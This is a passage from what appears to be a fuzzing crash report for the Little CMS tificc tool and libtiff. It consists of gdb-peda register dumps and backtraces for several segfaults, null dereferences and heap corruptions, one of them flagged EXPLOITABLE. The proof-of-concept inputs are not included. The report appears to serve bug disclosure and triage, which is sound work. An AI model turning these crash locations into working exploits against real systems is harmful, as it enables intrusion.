, argc=0x3, argv=0x7fffffffeba8, init=, fini=, rtld_fini=, stack_end=0x7fffffffeb 36 | 98) at ../csu/libc-start.c:291 37 | #7 0x0000000000408e29 in _start () 38 | 39 | __main__:99: UserWarning: GDB v7.11 may not support required Python API 40 | Description: Segmentation fault on program counter 41 | Short description: SegFaultOnPc (3/22) 42 | Hash: a623b76741d0ee9936f43614a95f8a38.d3ce2561115efa40618f8e7190e9ac1e 43 | Exploitability Classification: EXPLOITABLE 44 | Explanation: The target tried to access data at an address that matches the program counter. This is likely due to the execution of a branch instruction (ex: 'call') with a bad argument, but 45 | it could also be due to execution continuing past the end of a memory region or another cause. Regardless this likely indicates that the program counter contents are tainted and can be contro 46 | lled by an attacker. 47 | Other tags: AccessViolation (21/22) 48 | 49 | 50 | ``` 51 | 52 | 53 | 54 | ## 2.tiff-crash-TIFFWriteEncodeTile 55 | 56 | 这个crash在libtiff的TIFFWriteEncodeTile函数中,需要在最新版中分析。 57 | 58 | ``` 59 | Stopped reason: SIGABRT 60 | 0x00007ffff733f428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54 61 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 62 | gdb-peda$ bt 63 | #0 0x00007ffff733f428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54 64 | #1 0x00007ffff734102a in __GI_abort () at abort.c:89 65 | #2 0x00007ffff73817ea in __libc_message (do_abort=0x2, fmt=fmt@entry=0x7ffff749aed8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 66 | #3 0x00007ffff738c13e in malloc_printerr (ar_ptr=0x7ffff76ceb20 , ptr=0x60d430, str=0x7ffff7497d3f "malloc(): memory corruption", action=) at malloc.c:5006 67 | #4 _int_malloc (av=av@entry=0x7ffff76ceb20 , bytes=bytes@entry=0x2000) at malloc.c:3474 68 | #5 0x00007ffff738e184 in __GI___libc_malloc (bytes=0x2000) at malloc.c:2913 69 | #6 0x00007ffff7933af9 in TIFFWriteBufferSetup () from /usr/lib/x86_64-linux-gnu/libtiff.so.5 70 | #7 0x00007ffff79343b1 in TIFFWriteEncodedTile () from /usr/lib/x86_64-linux-gnu/libtiff.so.5 71 | #8 0x0000000000402db6 in TileBasedXform (hXForm=0x60e940, in=0x609860, out=0x60a4d0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:412 72 | #9 0x00000000004044db in TransformImage (in=0x609860, out=0x60a4d0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 73 | #10 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 74 | #11 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 75 | #12 0x0000000000401fe9 in _start () 76 | 77 | 78 | ``` 79 | 80 | 81 | ## 3-cms-NULL-Pointer-cmsEvalToneCurve16 82 | 83 | 84 | ``` 85 | gdb --args tificc $POC /tmp/out.tiff 86 | 87 | Program received signal SIGSEGV, Segmentation fault. 88 | [----------------------------------registers-----------------------------------] 89 | RAX: 0x0 90 | RBX: 0x7fffffffde94 --> 0x0 91 | RCX: 0x8 92 | RDX: 0x0 93 | RSI: 0x0 94 | RDI: 0x60e100 --> 0x0 95 | RBP: 0x7fffffffdde0 --> 0x7fffffffde10 --> 0x7fffffffde60 --> 0x7fffffffe2b0 --> 0x7fffffffe360 --> 0x7fffffffe3c0 (--> ...) 96 | RSP: 0x7fffffffddc0 --> 0xffffdde0 97 | RIP: 0x7ffff7b78259 (: mov rax,QWORD PTR [rax+0x80]) 98 | R8 : 0x2ce 99 | R9 : 0x7fffffffe3a0 --> 0x0 100 | R10: 0x9d 101 | R11: 0x7ffff7b7820b (: push rbp) 102 | R12: 0x60e10b --> 0x60c6600000000000 103 | R13: 0x7fffffffe630 --> 0x3 104 | R14: 0x0 105 | R15: 0x0 106 | EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 107 | [-------------------------------------code-------------------------------------] 108 | 0x7ffff7b7824d : call 0x7ffff7b6fa60 <__assert_fail@plt> 109 | 0x7ffff7b78252 : mov rax,QWORD PTR [rbp-0x18] 110 | 0x7ffff7b78256 : mov rax,QWORD PTR [rax] 111 | => 0x7ffff7b78259 : mov rax,QWORD PTR [rax+0x80] 112 | 0x7ffff7b78260 : mov rdx,QWORD PTR [rbp-0x18] 113 | 0x7ffff7b78264 : mov rdx,QWORD PTR [rdx] 114 | 0x7ffff7b78267 : lea rsi,[rbp-0xa] 115 | 0x7ffff7b7826b : lea rcx,[rbp-0x1c] 116 | [------------------------------------stack-------------------------------------] 117 | 0000| 0x7fffffffddc0 --> 0xffffdde0 118 | 0008| 0x7fffffffddc8 --> 0x60e100 --> 0x0 119 | 0016| 0x7fffffffddd0 --> 0x7fffffffde94 --> 0x0 120 | 0024| 0x7fffffffddd8 --> 0x286060b593741800 121 | 0032| 0x7fffffffdde0 --> 0x7fffffffde10 --> 0x7fffffffde60 --> 0x7fffffffe2b0 --> 0x7fffffffe360 --> 0x7fffffffe3c0 (--> ...) 122 | 0040| 0x7fffffffdde8 --> 0x7ffff7b781d2 (: mov WORD PTR [rbp-0x2],ax) 123 | 0048| 0x7fffffffddf0 --> 0xffffde10 124 | 0056| 0x7fffffffddf8 --> 0x60e100 --> 0x0 125 | [------------------------------------------------------------------------------] 126 | Legend: code, data, rodata, value 127 | Stopped reason: SIGSEGV 128 | 0x00007ffff7b78259 in cmsEvalToneCurve16 (Curve=0x60e100, v=0x0) at ../../cms/src/cmsgamma.c:1376 129 | 1376 Curve ->InterpParams ->Interpolation.Lerp16(&v, &out, Curve ->InterpParams); 130 | gdb-peda$ p Curve->InterpParams 131 | $1 = (cmsInterpParams *) 0x0 132 | 133 | 134 | ``` 135 | 136 | ## 4-cms-invalid-access-AllocateToneCurveStruct 137 | 138 | ``` 139 | 140 | gdb --args tificc $POC /tmp/out.tiff 141 | 142 | Program received signal SIGSEGV, Segmentation fault. 143 | [----------------------------------registers-----------------------------------] 144 | RAX: 0xfffffffc 145 | RBX: 0x7fffffffdea8 --> 0x7fff00000000 146 | RCX: 0xffffffffffffffff 147 | RDX: 0x7ffff7b74c00 (: rex.RB loopne 0x7ffff7b74c4b ) 148 | RSI: 0x60e6c0 --> 0x4003333333333333 149 | RDI: 0xfffffffc 150 | RBP: 0x7fffffffddf0 --> 0x7fffffffde20 --> 0x7fffffffde70 --> 0x7fffffffe2c0 --> 0x7fffffffe370 --> 0x7fffffffe3d0 (--> ...) 151 | RSP: 0x7fffffffdda8 --> 0x7ffff7b75ecb (: movq rax,xmm0) 152 | RIP: 0x7ffff7b74c4b (: (bad)) 153 | R8 : 0x2ce 154 | R9 : 0x7fffffffe3b0 --> 0x0 155 | R10: 0x15b 156 | R11: 0x7ffff7b97389 (: push rbp) 157 | R12: 0x60c141 --> 0xb800007ffff7b74c 158 | R13: 0x7fffffffe640 --> 0x3 159 | R14: 0x0 160 | R15: 0x0 161 | EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) 162 | [-------------------------------------code-------------------------------------] 163 | => 0x7ffff7b74c4b : (bad) 164 | 0x7ffff7b74c4c : je 0x7ffff7b74c65 165 | 0x7ffff7b74c4e : mov rax,QWORD PTR [rbp-0x20] 166 | 0x7ffff7b74c52 : mov rdx,QWORD PTR [rax+0x20] 167 | [------------------------------------stack-------------------------------------] 168 | 0000| 0x7fffffffdda8 --> 0x7ffff7b75ecb (: movq rax,xmm0) 169 | 0008| 0x7fffffffddb0 --> 0x1 170 | 0016| 0x7fffffffddb8 --> 0x0 171 | 0024| 0x7fffffffddc0 --> 0x0 172 | 0032| 0x7fffffffddc8 --> 0x609df0 --> 0x60c180 --> 0x0 173 | 0040| 0x7fffffffddd0 --> 0x4237ffff80018000 174 | 0048| 0x7fffffffddd8 --> 0xc9cc2500 175 | 0056| 0x7fffffffdde0 --> 0x0 176 | [------------------------------------------------------------------------------] 177 | Legend: code, data, rodata, value 178 | Stopped reason: SIGSEGV 179 | 0x00007ffff7b74c4b in AllocateToneCurveStruct (ContextID=0x0, nEntries=0x0, nSegments=0x1, Segments=0x7ffff7b75ecb , Values=0x7fffffffddf0) at ../../cms/src/cmsgamma.c:304 180 | 304 if (p -> Evals) _cmsFree(ContextID, p -> Evals); 181 | gdb-peda$ p p 182 | $1 = (cmsToneCurve *) 0x4237ffff80018000 183 | gdb-peda$ p *p 184 | Cannot access memory at address 0x4237ffff80018000 185 | ``` 186 | 187 | 188 | ## 5-cms-invalid-access-cmsReadHeader 189 | 190 | 191 | ``` 192 | gdb --args tificc $POC /tmp/out.tiff 193 | Program received signal SIGSEGV, Segmentation fault. 194 | 0x00007ffff7b80000 in _cmsReadHeader (Icc=0x1b7d90508ff21000) at ../../cms/src/cmsio0.c:699 195 | 699 cmsSignalError(Icc ->ContextID, cmsERROR_BAD_SIGNATURE, "not an ICC profile, invalid signature"); 196 | [----------------------------------registers-----------------------------------] 197 | RAX: 0x7ffff7b80000 (<_cmsReadHeader+150>: add BYTE PTR [rax],al) 198 | RBX: 0x7ffff4d764dc --> 0x0 199 | RCX: 0x1fe020 200 | RDX: 0x7ffff4d764dc --> 0x0 201 | RSI: 0x7fffffffe2d0 --> 0x0 202 | RDI: 0x60c410 --> 0x0 203 | RBP: 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 --> 0x405ad0 (<__libc_csu_init>: push r15) 204 | RSP: 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 205 | RIP: 0x7ffff7b80000 (<_cmsReadHeader+150>: add BYTE PTR [rax],al) 206 | R8 : 0x2ce 207 | R9 : 0x7fffffffe370 --> 0x0 208 | R10: 0x15b 209 | R11: 0x7ffff7b97389 (: push rbp) 210 | R12: 0x60c422 --> 0x8ee00007ffff7b8 211 | R13: 0x7fffffffe600 --> 0x3 212 | R14: 0x0 213 | R15: 0x0 214 | EFLAGS: 0x10287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow) 215 | [-------------------------------------code-------------------------------------] 216 | => 0x7ffff7b80000 <_cmsReadHeader+150>: add BYTE PTR [rax],al 217 | 0x7ffff7b80002 <_cmsReadHeader+152>: add al,ch 218 | 0x7ffff7b80004 <_cmsReadHeader+154>: push 0xffffffffb8fffefb 219 | 0x7ffff7b80009 <_cmsReadHeader+159>: add BYTE PTR [rax],al 220 | [------------------------------------stack-------------------------------------] 221 | 0000| 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 222 | 0008| 0x7fffffffe290 --> 0x0 223 | 0016| 0x7fffffffe298 --> 0x7fffffffe370 --> 0x0 224 | 0024| 0x7fffffffe2a0 --> 0x1fe02000000001 225 | 0032| 0x7fffffffe2a8 --> 0x60aee0 --> 0x0 226 | 0040| 0x7fffffffe2b0 --> 0x7ffff4d71010 --> 0x0 227 | 0048| 0x7fffffffe2b8 --> 0x60c410 --> 0x0 228 | 0056| 0x7fffffffe2c0 --> 0x71600000000 229 | [------------------------------------------------------------------------------] 230 | Legend: code, data, rodata, value 231 | Stopped reason: SIGSEGV 232 | gdb-peda$ bt 233 | #0 0x00007ffff7b80000 in _cmsReadHeader (Icc=0x1b7d90508ff21000) at ../../cms/src/cmsio0.c:699 234 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60c410, InputBuffer=0x7ffff4d71010, OutputBuffer=0x60aee0, Size=0x1fe020) at ../../cms/src/cmsxform.c:189 235 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60c410, in=0x609860, out=0x60a5c0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 236 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a5c0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 237 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 238 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 239 | #6 0x0000000000401fe9 in _start () 240 | gdb-peda$ p Icc 241 | $3635 = (_cmsICCPROFILE *) 0x1b7d90508ff21000 242 | gdb-peda$ p Icc->ContextID 243 | Cannot access memory at address 0x1b7d90508ff21008 244 | 245 | 246 | ``` 247 | 248 | 249 | ## 6-cms-invalid-access-Pack3Bytes 250 | 251 | 252 | ``` 253 | 254 | gdb --args tificc $POC /tmp/out.tiff 255 | Program received signal SIGSEGV, Segmentation fault. 256 | [----------------------------------registers-----------------------------------] 257 | RAX: 0x643001 258 | RBX: 0x7ffff5f94fd1 --> 0x0 259 | RCX: 0x0 260 | RDX: 0x643000 ('') 261 | RSI: 0x0 262 | RDI: 0x60c8f0 --> 0x4001900040091 263 | RBP: 0x7fffffffe280 --> 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 (--> ...) 264 | RSP: 0x7fffffffe280 --> 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 (--> ...) 265 | RIP: 0x7ffff7b9095a (: mov BYTE PTR [rdx],cl) 266 | R8 : 0x1 267 | R9 : 0x7fffffffe370 --> 0x0 268 | R10: 0x15b 269 | R11: 0x7ffff7b97389 (: push rbp) 270 | R12: Cannot access memory address 271 | R13: 0x7fffffffe600 --> 0x3 272 | R14: 0x0 273 | R15: 0x0 274 | EFLAGS: 0x10247 (CARRY PARITY adjust ZERO sign trap INTERRUPT direction overflow) 275 | [-------------------------------------code-------------------------------------] 276 | 0x7ffff7b9094b : imul ecx,ecx,0xff01 277 | 0x7ffff7b90951 : add ecx,0x800000 278 | 0x7ffff7b90957 : shr ecx,0x18 279 | => 0x7ffff7b9095a : mov BYTE PTR [rdx],cl 280 | 0x7ffff7b9095c : pop rbp 281 | 0x7ffff7b9095d : ret 282 | 0x7ffff7b9095e : push rbp 283 | 0x7ffff7b9095f : mov rbp,rsp 284 | [------------------------------------stack-------------------------------------] 285 | 0000| 0x7fffffffe280 --> 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 (--> ...) 286 | 0008| 0x7fffffffe288 --> 0x7ffff7b97b7f (: mov r12,rax) 287 | 0016| 0x7fffffffe290 --> 0x0 288 | 0024| 0x7fffffffe298 --> 0x7fffffffe370 --> 0x0 289 | 0032| 0x7fffffffe2a0 --> 0x1fe02000000001 290 | 0040| 0x7fffffffe2a8 --> 0x60d040 --> 0x0 291 | 0048| 0x7fffffffe2b0 --> 0x7ffff5f5f010 --> 0x0 292 | 0056| 0x7fffffffe2b8 --> 0x60c8f0 --> 0x4001900040091 293 | [------------------------------------------------------------------------------] 294 | Legend: code, data, rodata, value 295 | Stopped reason: SIGSEGV 296 | 0x00007ffff7b9095a in Pack3Bytes (info=0x60c8f0, wOut=0x0, output=0x643001 , Stride=0x0) at ../../cms/src/cmspack.c:1834 297 | 1834 *output++ = FROM_16_TO_8(wOut[2]); 298 | gdb-peda$ p wOut[2] 299 | Cannot access memory at address 0x4 300 | 301 | 302 | 303 | ``` 304 | 305 | 306 | ## 7-cms-null-pointer-cmsPipelineCheckAndRetreiveStages 307 | 308 | ``` 309 | gdb --args tificc $POC /tmp/out.tiff 310 | Program received signal SIGILL, Illegal instruction. 311 | [----------------------------------registers-----------------------------------] 312 | RAX: 0x7ffff7b85252 (: sbb al,0xff) 313 | RBX: 0x620c44 --> 0x52d552c552b552a5 314 | RCX: 0x3030 ('00') 315 | RDX: 0x620c44 --> 0x52d552c552b552a5 316 | RSI: 0x7fffffffe2d0 --> 0x529552855275 317 | RDI: 0x60c430 ("QQQQQ", 'R' , "\270\367\377\177") 318 | RBP: 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 --> 0x405ad0 (<__libc_csu_init>: push r15) 319 | RSP: 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 320 | RIP: 0x7ffff7b85254 (: (bad)) 321 | R8 : 0x1 322 | R9 : 0x7fffffffe370 --> 0x0 323 | R10: 0x15b 324 | R11: 0x7ffff7b97389 (: push rbp) 325 | R12: 0x60c442 --> 0x8ee00007ffff7b8 326 | R13: 0x7fffffffe600 --> 0x3 327 | R14: 0x0 328 | R15: 0x0 329 | EFLAGS: 0x10213 (CARRY parity ADJUST zero sign trap INTERRUPT direction overflow) 330 | [-------------------------------------code-------------------------------------] 331 | => 0x7ffff7b85254 : (bad) 332 | 0x7ffff7b85255 : push QWORD PTR [rdx+rcx*1-0x48] 333 | 0x7ffff7b85259 : add BYTE PTR [rax],al 334 | 0x7ffff7b8525b : add BYTE PTR [rax],al 335 | [------------------------------------stack-------------------------------------] 336 | 0000| 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 337 | 0008| 0x7fffffffe290 --> 0x0 338 | 0016| 0x7fffffffe298 --> 0x7fffffffe370 --> 0x0 339 | 0024| 0x7fffffffe2a0 --> 0x303000000001 340 | 0032| 0x7fffffffe2a8 --> 0x60af00 --> 0x40007ff6eb 341 | 0040| 0x7fffffffe2b0 --> 0x61e1c0 --> 0x7ffff76ceb78 --> 0x6302e0 --> 0x0 342 | 0048| 0x7fffffffe2b8 --> 0x60c430 ("QQQQQ", 'R' , "\270\367\377\177") 343 | 0056| 0x7fffffffe2c0 --> 0x71600000000 344 | [------------------------------------------------------------------------------] 345 | Legend: code, data, rodata, value 346 | Stopped reason: SIGILL 347 | 0x00007ffff7b85254 in cmsPipelineCheckAndRetreiveStages (Lut=0x0, n=0x0) at ../../cms/src/cmslut.c:129 348 | 129 if (mpe ->Type != Type) 349 | gdb-peda$ p mpe 350 | $1 = (cmsStage *) 0x0 351 | gdb-peda$ bt 352 | #0 0x00007ffff7b85254 in cmsPipelineCheckAndRetreiveStages (Lut=0x0, n=0x0) at ../../cms/src/cmslut.c:129 353 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60c430, InputBuffer=0x61e1c0, OutputBuffer=0x60af00, Size=0x3030) at ../../cms/src/cmsxform.c:189 354 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60c430, in=0x609860, out=0x60a5e0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 355 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a5e0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 356 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 357 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 358 | #6 0x0000000000401fe9 in _start () 359 | 360 | ``` 361 | 362 | ## 8-cms-crash-UnrollDoubleTo16 363 | 364 | 365 | ``` 366 | gdb --args tificc $POC /tmp/out.tiff 367 | Program received signal SIGILL, Illegal instruction. 368 | [----------------------------------registers-----------------------------------] 369 | RAX: 0x7ffff7b8f000 (: rex.RB fsubr st,st(0)) 370 | RBX: 0x7ffff4d79518 --> 0x0 371 | RCX: 0x1fe020 372 | RDX: 0x7ffff4d79518 --> 0x0 373 | RSI: 0x7fffffffe2d0 --> 0x0 374 | RDI: 0x60ea40 --> 0x0 375 | RBP: 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 --> 0x405ad0 (<__libc_csu_init>: push r15) 376 | RSP: 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 377 | RIP: 0x7ffff7b8f003 (: (bad)) 378 | R8 : 0x2ce 379 | R9 : 0x7fffffffe370 --> 0x0 380 | R10: 0x15b 381 | R11: 0x7ffff7b97389 (: push rbp) 382 | R12: 0x60ea51 --> 0xee00007ffff7b8f0 383 | R13: 0x7fffffffe600 --> 0x3 384 | R14: 0x0 385 | R15: 0x0 386 | EFLAGS: 0x10283 (CARRY parity adjust zero SIGN trap INTERRUPT direction overflow) 387 | [-------------------------------------code-------------------------------------] 388 | => 0x7ffff7b8f003 : (bad) 389 | 0x7ffff7b8f004 : jmp 0x7ffff7b8f005 390 | 0x7ffff7b8f006 : jmp QWORD PTR [rsi-0x77] 391 | 0x7ffff7b8f009 : rex.RB movs BYTE PTR es:[rdi],BYTE PTR ds:[rsi] 392 | [------------------------------------stack-------------------------------------] 393 | 0000| 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 394 | 0008| 0x7fffffffe290 --> 0x0 395 | 0016| 0x7fffffffe298 --> 0x7fffffffe370 --> 0x0 396 | 0024| 0x7fffffffe2a0 --> 0x1fe02000000001 397 | 0032| 0x7fffffffe2a8 --> 0x60c900 --> 0x0 398 | 0040| 0x7fffffffe2b0 --> 0x7ffff4d71010 --> 0x0 399 | 0048| 0x7fffffffe2b8 --> 0x60ea40 --> 0x0 400 | 0056| 0x7fffffffe2c0 --> 0xb1b00000000 401 | [------------------------------------------------------------------------------] 402 | Legend: code, data, rodata, value 403 | Stopped reason: SIGILL 404 | 0x00007ffff7b8f003 in UnrollDoubleTo16 (info=0x7ffff4d79518, wIn=0x60ea51, accum=0x7fffffffe600 "\003", Stride=0x0) at ../../cms/src/cmspack.c:989 405 | 989 vi = _cmsQuickSaturateWord(v * maximum); 406 | gdb-peda$ bt 407 | #0 0x00007ffff7b8f003 in UnrollDoubleTo16 (info=0x7ffff4d79518, wIn=0x60ea51, accum=0x7fffffffe600 "\003", Stride=0x0) at ../../cms/src/cmspack.c:989 408 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60ea40, InputBuffer=0x7ffff4d71010, OutputBuffer=0x60c900, Size=0x1fe020) at ../../cms/src/cmsxform.c:189 409 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60ea40, in=0x609860, out=0x60a5b0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 410 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a5b0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 411 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 412 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 413 | #6 0x0000000000401fe9 in _start () 414 | 415 | 416 | ``` 417 | 418 | 419 | ## 9-cms-heap-overflow 420 | 421 | ``` 422 | 423 | [----------------------------------registers-----------------------------------] 424 | RAX: 0x0 425 | RBX: 0x65 ('e') 426 | RCX: 0xffffffffffffffff 427 | RDX: 0x6 428 | RSI: 0x1390 429 | RDI: 0x1390 430 | RBP: 0x7fffffffdad0 --> 0x50 ('P') 431 | RSP: 0x7fffffffd738 --> 0x7ffff734102a (<__GI_abort+362>: mov rdx,QWORD PTR fs:0x10) 432 | RIP: 0x7ffff733f428 (<__GI_raise+56>: cmp rax,0xfffffffffffff000) 433 | R8 : 0x6 434 | R9 : 0x0 435 | R10: 0x8 436 | R11: 0x206 437 | R12: 0x65 ('e') 438 | R13: 0x7fffffffd8e8 --> 0x7fffffffde80 --> 0x7fffffffdf14 --> 0xf4e7901000000000 439 | R14: 0x7fffffffd8e8 --> 0x7fffffffde80 --> 0x7fffffffdf14 --> 0xf4e7901000000000 440 | R15: 0x2 441 | EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 442 | [-------------------------------------code-------------------------------------] 443 | 0x7ffff733f41e <__GI_raise+46>: mov eax,0xea 444 | 0x7ffff733f423 <__GI_raise+51>: movsxd rdi,ecx 445 | 0x7ffff733f426 <__GI_raise+54>: syscall 446 | => 0x7ffff733f428 <__GI_raise+56>: cmp rax,0xfffffffffffff000 447 | 0x7ffff733f42e <__GI_raise+62>: ja 0x7ffff733f450 <__GI_raise+96> 448 | 0x7ffff733f430 <__GI_raise+64>: repz ret 449 | 0x7ffff733f432 <__GI_raise+66>: nop WORD PTR [rax+rax*1+0x0] 450 | 0x7ffff733f438 <__GI_raise+72>: test ecx,ecx 451 | [------------------------------------stack-------------------------------------] 452 | 0000| 0x7fffffffd738 --> 0x7ffff734102a (<__GI_abort+362>: mov rdx,QWORD PTR fs:0x10) 453 | 0008| 0x7fffffffd740 --> 0x20 (' ') 454 | 0016| 0x7fffffffd748 --> 0x0 455 | 0024| 0x7fffffffd750 --> 0x0 456 | 0032| 0x7fffffffd758 --> 0x0 457 | 0040| 0x7fffffffd760 --> 0x0 458 | 0048| 0x7fffffffd768 --> 0x0 459 | 0056| 0x7fffffffd770 --> 0x0 460 | [------------------------------------------------------------------------------] 461 | Legend: code, data, rodata, value 462 | Stopped reason: SIGABRT 463 | 0x00007ffff733f428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54 464 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 465 | gdb-peda$ bt 466 | #0 0x00007ffff733f428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54 467 | #1 0x00007ffff734102a in __GI_abort () at abort.c:89 468 | #2 0x00007ffff73817ea in __libc_message (do_abort=0x2, fmt=fmt@entry=0x7ffff749aed8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 469 | #3 0x00007ffff738c13e in malloc_printerr (ar_ptr=0x7ffff76ceb20 , ptr=0x610740, str=0x7ffff7497d3f "malloc(): memory corruption", action=) at malloc.c:5006 470 | #4 _int_malloc (av=av@entry=0x7ffff76ceb20 , bytes=bytes@entry=0x40) at malloc.c:3474 471 | #5 0x00007ffff738e184 in __GI___libc_malloc (bytes=0x40) at malloc.c:2913 472 | #6 0x00007ffff7b73542 in _cmsMallocDefaultFn (ContextID=0x4, size=0x40) at ../../cms/src/cmserr.c:97 473 | #7 0x00007ffff7b73921 in _cmsMalloc (ContextID=0x4, size=0x40) at ../../cms/src/cmserr.c:267 474 | #8 0x00007ffff7b73564 in _cmsMallocZeroDefaultFn (ContextID=0x4, size=0x40) at ../../cms/src/cmserr.c:106 475 | #9 0x00007ffff7b7395d in _cmsMallocZero (ContextID=0x4, size=0x40) at ../../cms/src/cmserr.c:274 476 | #10 0x00007ffff7b84f63 in _cmsStageAllocPlaceholder (ContextID=0x4, Type=cmsSigMatrixElemType, InputChannels=0x3, OutputChannels=0x3, EvalPtr=0x7ffff7b85896 , DupElemPtr=0x7ffff7b85995 , FreePtr=0x7ffff7b85a5d , Data=0x0) at ../../cms/src/cmslut.c:40 477 | #11 0x00007ffff7b85b9c in cmsStageAllocMatrix (ContextID=0x4, Rows=0x3, Cols=0x3, Matrix=0x7ffff7bbe400 , Offset=0x0) at ../../cms/src/cmslut.c:394 478 | #12 0x00007ffff7b87501 in _cmsStageAllocLabV2ToV4 (ContextID=0x4) at ../../cms/src/cmslut.c:1030 479 | #13 0x00007ffff7b75ecb in EvalSegmentedFn (g=0x60ee90, R=0) at ../../cms/src/cmsgamma.c:694 480 | #14 0x00007ffff7b78205 in cmsEvalToneCurveFloat (Curve=0x60ee90, v=0) at ../../cms/src/cmsgamma.c:1366 481 | #15 0x00007ffff7b85426 in EvaluateCurves (In=0x7fffffffde60, Out=0x7fffffffe060, mpe=0x60eae0) at ../../cms/src/cmslut.c:182 482 | #16 0x00007ffff7b87c5d in _LUTeval16 (In=0x1390, Out=0x7fffffffe2f0, D=0x0) at ../../cms/src/cmslut.c:1334 483 | #17 0x00007ffff7b97b5e in PrecalculatedXFORM (p=0x60e940, in=0x7ffff4e79010, out=0x60f050, PixelsPerLine=0x1e803d, LineCount=0x1, Stride=0x7fffffffe370) at ../../cms/src/cmsxform.c:411 484 | #18 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60e940, InputBuffer=0x7ffff4e79010, OutputBuffer=0x60f050, Size=0x1e803d) at ../../cms/src/cmsxform.c:189 485 | #19 0x0000000000402d73 in TileBasedXform (hXForm=0x60e940, in=0x609860, out=0x60a4d0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 486 | #20 0x00000000004044db in TransformImage (in=0x609860, out=0x60a4d0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 487 | #21 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 488 | #22 0x00007ffff732a830 in __libc_start_main (main=0x404c38
